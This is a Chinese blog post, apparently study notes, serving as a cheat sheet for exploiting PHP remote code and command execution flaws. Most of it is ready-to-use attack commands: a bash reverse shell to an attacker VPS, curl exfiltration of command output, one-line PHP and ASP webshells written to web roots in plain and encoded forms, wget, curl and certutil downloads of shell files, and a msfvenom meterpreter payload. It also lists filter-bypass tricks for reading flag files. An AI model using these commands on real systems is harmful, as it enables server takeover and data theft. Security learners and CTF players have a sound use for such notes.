通用漏洞-RCE代码执行&命令执行20240604

最新推荐文章于 2024-08-20 22:51:42 发布
最新推荐文章于 2024-08-20 22:51:42 发布
阅读量449 收藏 14
点赞数 24
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71608744/article/details/139454821
版权

文章推荐

WEB 安全—深入学习命令执行漏洞-CSDN博客

RCE漏洞总结及绕过---系统命令执行篇-CSDN博客

概述

代码执行

>引用脚本代码解析执行
代码执行漏洞是由于服务器 对危险函数过滤不严导致用户输入的一些字符串可以被转换成代码来执行,从而造成代码执行漏洞

命令执行

>脚本调用操作系统命令

Web应用的脚本代码在执行命令的时候过滤不严

从而注入一段攻击者能够控制的代码,在服务器上以Web服务的后台权限远程执行恶意指令

一、PHP语言

1.1代码执行函数

函数介绍:

https://www.cnblogs.com/networkroom/p/16395024.html

https://www.ngui.cc/article/show-519518.html?action=onClick

eval()、assert()、preg_replace()、create_function()、array_map()、
call_user_func()、call_user_func_array()、array_filter()、
uasort()、等

1.2命令执行函数

 函数介绍:

https://www.cnblogs.com/networkroom/p/16395024.html

https://www.ngui.cc/article/show-519518.html?action=onClick

system()、exec()、shell_exec()、pcntl_exec()、popen()、
proc_popen()、passthru()、等

1.3利用手段

出网测试

1、使用dnslog.cn、ceye.io
原理:反引号的命令会自动执行并返回命令执行的结果拼接到命令里
在这里插入图片描述
2、VPS

先在vps处用nc进行监听
nc -l -p 8080 -vvv nc -lvnp 9988
然后在靶机命令执行处输入
|bash -i >& /dev/tcp/xxxxxI(你的vps的公网ip)/8080 0>&1

3、VPS 开启httpserver 服务

pyhton -m http.server 8888      #pyhton3中启动方式,开启的端口为80
python -m SimpleHTTPServer 8888    #python2启动方式
curl http://vps_ip:8888/`whoami`
3.2 写入Shell

1、查找路径

locate 00000.png 2>/dev/null
find / -name 00000.png 2>/dev/null
find / | grep 00000.png 2>/dev/null
find /var/www/html/ -name "*.php"
| xargs grep "某某网站"
dir /a/b/s c:\xxxxx.jpg

2、常规写入

在有写入权限、知道路径的的情况下,直接写入一句话getshell
echo ' eval($_POST[1]);?>' > /var/www/html/shell.php
set /p="<%execute request("1")%>" > C:\inetpub\wwwroot\shell.asp
echo ^<%execute request("1")%^> > C:\inetpub\wwwroot\shell.asp

3、远程下载写入:

curl http://192.168.1.100/shell.txt >
/var/www/html/shell.php
wget http://192.168.1.120/shell.txt -O
/var/www/html/shell.php

4、远程下载写入:

curl http://192.168.1.100/shell.txt > /var/www/html/shell.php
wget http://192.168.1.120/shell.txt -O /var/www/html/shell.php
certutil -urlcache -split -f http://192.168.1.105:8080/shell.txt C:\inetpub\wwwroot\shell.asp

5、编码方式写入:

echo PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+ | base64 -d > /var/www/html/shell.php
echo 3C3F706870206576616C28245F504F53545B315D293B3F3E | xxd -r -ps > /var/www/html/shell.php
更多姿势参考链接:https://www.wangan.com/p/7fy7fxcc831261a2
3.3 反弹Shell
/bin/bash -i >& /dev/tcp/vps_ip/4433 0>&1
3.4 CS/Msf 马
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.43.223 LPORT=4444 -f elf -o 1.elf

1.4绕过手法

通配符

falg=fl*
cat fl*
cat ?la*

可以利用通配符来进行模糊匹配,配合占位符来进行绕过

转义符号

ca\t /fl\ag
cat fl''ag

拼接法

a=fl;b=ag;cat $IFS$a$b

反引号

cat `ls`

编码绕过

组合绕过

touch "ag"
touch  "fl\\"
touch "t \\"
touch  "ca\\"
ls -t >shell
sh shell 

#\代表换行
#ls -t 代表将文本按时间排序输出
# ls -t > shell 代表将输出输入到shell文件中
# sh shell 代表将文本中的文字读取出来执行

使用空变量$*和$@,$x,${x}绕过

ca$*t fl$*ag
ca$@t fl$@ag
ca$5t fl$5ag
ca${2}t fl${2}ag

异或无符号(针对过滤了0-9a-zA-z)

异或: rce-xor.php & rce-xor.py
或: rce-xor-or.php & rce-xor-or.py

管道符

管道符实例描述
;A;B无论真假,A与B都执行
&A&B无论真假,A与B都执行
&&A&&BA为真时才执行B,否则只执行A
|A|B显示B的执行结果
||A||BA为假时才执行B,否则只执行A

空格过滤

以下可代替空格
<<>%20(即space)
%09(即tab)$IFS$9${IFS}
$IFS{cat,/flag}

cat替换命令

morelesscattac
headtailvivim
nlodsortuniq
tac	与cat相反,按行反向输出
more	按页显示,用于文件内容较多且不能滚动屏幕时查看文件
less	与more类似
tail	查看文件末几行
head	查看文件首几行
nl	在cat查看文件的基础上显示行号
od	以二进制方式读文件,od -A d -c /flag转人可读字符
xxd	以二进制方式读文件,同时有可读字符显示
sort	排序文件
uniq	报告或删除文件的重复行
file -f	报错文件内容
grep	过滤查找字符串,grep flag /flag

1.5无回显利用

直接写入一个文件访问判断

直接进行对外访问判断

二、java语言(未写)

三、python语言(未写)

烟雨不是雨
关注
  • 24
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
RCE——命令执行漏洞
zjdda的博客
07-13 1822
命令执行漏洞介绍 应用程序有时需要调用一些执行系统命令的函数、如在PHP中,以下函数: system:system()—执行shell命令也就是向dos发送一条指令。 exec:exec—方便的PHP函数发送一个字符串供操作系统的命令行处理。 shell_exec:shell_exec— 通过 shell 环境执行命令,并且将完整的输出以字符串的方式返回。 passthru:passthru ()只调用命令,不返回任何结果,但把命令的运行结果原样地直接输出到标准输出设备上。输入/输出— ppopen:pop
WEB漏洞-RCE代码命令执行漏洞代码执行
weixin_46425310的博客
07-23 517
WEB漏洞-RCE代码命令执行漏洞代码执行:eg. * eval():PHP中函数,会将()内的内容当作PHP代码执行,例如eval(phpinfo()???? 就会显示出phpinfo()执行后的后果。 命令执行:eg. * system() 可以执行外部命令,例如system(ipconfig),可以返回在系统中调用ipconfig的结果。 漏洞形成条件: 1. 可控变量 2. 漏洞函数 利用系统命令执行漏洞时常常会用到管道符:Window系列支持的管道符如下所示。 * " | ":直接执行后面的语
命令执行-无字母数字webshell
leekos的博客,分享web安全相关知识~
12-26 2058
命令执行无字母数字webshell
WEB攻防-RCE代码&命令执行&过滤绕过&异或无字符&无回显方案&黑白盒挖掘
siu~
10-25 794
1、RCE-原理-代码执行&命令执行 2、RCE-黑白盒-过滤绕过&不回显方案
第30天:WEB漏洞-RCE代码命令执行漏洞全解1
08-03
**WEB漏洞-RCE代码命令执行漏洞全解** 在Web应用程序的开发过程中,为了实现功能的多样性与便捷性,程序员常常会使用代码调用或命令执行功能。然而,这种做法也可能带来严重的安全风险,即代码执行RCE,Remote ...
xml执行java源码-Axis-1.4-RCE-Poc:Axis<=1.4远程命令执行RCE)POC
06-06
远程命令执行RCE) POC 环境准备 首先下载Axis1.4 本仓库有一个打包好的axis直接解压到tomcat webapps下即可 ,web-inf/web.xml 去掉AdminServlet注释 然后,server-config.wsdd文件开启enableRemoteAdmin (本地...
shiro-1.2.4-rce:shiro <= 1.2.4反序列化命令脚本
05-22
= 1.2.4 反序列化远程命令执行利用脚本 使用延时判断key和gadget,即使目标不出网也可以检测是否存在漏洞 python脚本需要调用ysoserial-sleep.jar,ysoserial-sleep.jar文件并不是原版的,增加了延时命令功能,故...
fastjson-rce-exploit:利用fastjson远程执行代码漏洞
03-15
首先,我们要理解什么是远程代码执行漏洞。在计算机安全领域,RCE漏洞允许攻击者在没有权限的情况下,在目标系统上执行任意代码。这种漏洞往往具有极高的危险性,因为它可能导致数据泄露、系统瘫痪甚至完全控制目标...
CVE-2020-0688 Exchange RCE 任意命令执行
03-29
# CVE-2020-0688 Exchange RCE 前提: 已知一个域用户 影响版本: -Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30 -Microsoft Exchange Server 2013 Cumulative Update 23 -Microsoft ...
网络硬盘录像机NVR解決方案:海思3520D模组与全面的NVR方案支持
Lnton羚通科技
08-16 621
通过深度优化的协议解析,保证了摄像头与NVR之间的数据传输稳定高效,避免了常见的兼容性问题。我们基于Hisi海思平台的NVR方案,凭借其卓越的ONVIF兼容性、强大的系统性能和丰富的功能模块,在激烈的市场竞争中脱颖而出。功能全面性:相较于一些针对特定市场的NVR产品,我们的方案涵盖了从基本的录像与回放,到复杂的告警与系统管理等多种功能,能够满足不同用户的多样化需求。我们基于Hisi海思平台推出的NVR全套方案,凭借其强大的兼容性、丰富的功能模块,以及出色的系统稳定性,为用户提供了一站式的安防解决方案。
特洛伊木马:现代网络安全的隐形威胁
weixin_48579910的博客
08-16 618
特洛伊木马是一种伪装成合法软件或文件的恶意程序。攻击者利用这种伪装,使受害者在不知情的情况下主动安装或运行木马,从而为攻击者打开了进入目标系统的大门。与病毒不同,木马并不会自我复制,而是通过社会工程学等手段诱使用户下载和执行。特洛伊木马虽然是网络世界中的“老兵”,但其隐蔽性和多样性使得它至今仍然是网络安全的一大威胁。了解木马的工作原理和危害,并采取适当的防范措施,可以帮助我们在数字化生活中更加安全地航行。
MPLS相关实验
最新发布
2302_78454622的博客
08-20 103
4、R1上使用静态,R7上运行rip协议,R8上运行ospf协议。3、在R2、R3、R4、R5、R6上运行MPLS。2、R3、R4、R5、R6运行ospf。1、合理利用IP地址进行分配。一、实验拓扑图以及实验要求。一、实验拓扑图以及实验要求。
Connection reset by peer报错解决
m0_65307735的博客
08-16 358
Connection reset by peer报错解决
【TCP】核心机制:延时应答、捎带应答和面向字节流
Yeeear的博客
08-20 732
TCP的核心机制之延时应答、捎带应答和面向字节流。四次挥手如何变成三次挥手,如何解决粘包问题,TCP报头,首部长度、保留位、选项、序号、确认序号
真实故障案例-网页缓慢(打不开网页,测试公网连通性又是通的)mtu/mss
Fe_smoothly的博客
08-16 716
mtu mss上网的网段无法打开网页,登录QQ,ping域名都正常,dns解析正常。
Linux网络编程—listen、accept、connect
qincjun的博客
08-19 145
include //头文件;这四个文件一包,基本网络就无问题了;2.backlog:监听的队列;比如有大量的链接进入,只能连1个链接;剩余的没连上的‘就会等待被链接;描述:此函数为阻塞式函数;在未连接时,处于阻塞状态等待链接;链接完成后,则正常向下运行;监听:将套接字(文件描述符)变成监听状态;监视是否有链接进入;1.socket:套接字(文件描述符);将创建的套接字传入;参数:请参考以下链接描述。
什么原因会导致websocket断连
qq_65665724的博客
08-20 121
在实际应用中,为了防止WebSocket连接断开,我们可以采取一些措施。其次,我们可以增加心跳机制。此外,我们还可以优化网络环境、加强服务器性能和优化代码等方面来减少WebSocket连接断开的风险。在实际应用中,我们需要根据具体情况来分析WebSocket连接断开的原因,并采取相应的措施来解决。同时,我们也可以借助一些工具和日志来帮助我们分析和解决WebSocket连接断开的问题。通过采取相应的措施和工具,我们可以减少WebSocket连接断开的风险,提高Web应用的稳定性和可用性。
Tomcat 8下Struts2 S2-020漏洞RCE命令执行细节分析
本文档由neobyte于2014年4月3日在百度安全中心博客上发布,主要讨论的是Struts2框架中的S2-020漏洞在Tomcat 8版本下的命令执行分析。S2-020漏洞是一个重要的安全问题,涉及远程代码执行(RCE),可能导致拒绝服务(DOS)...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值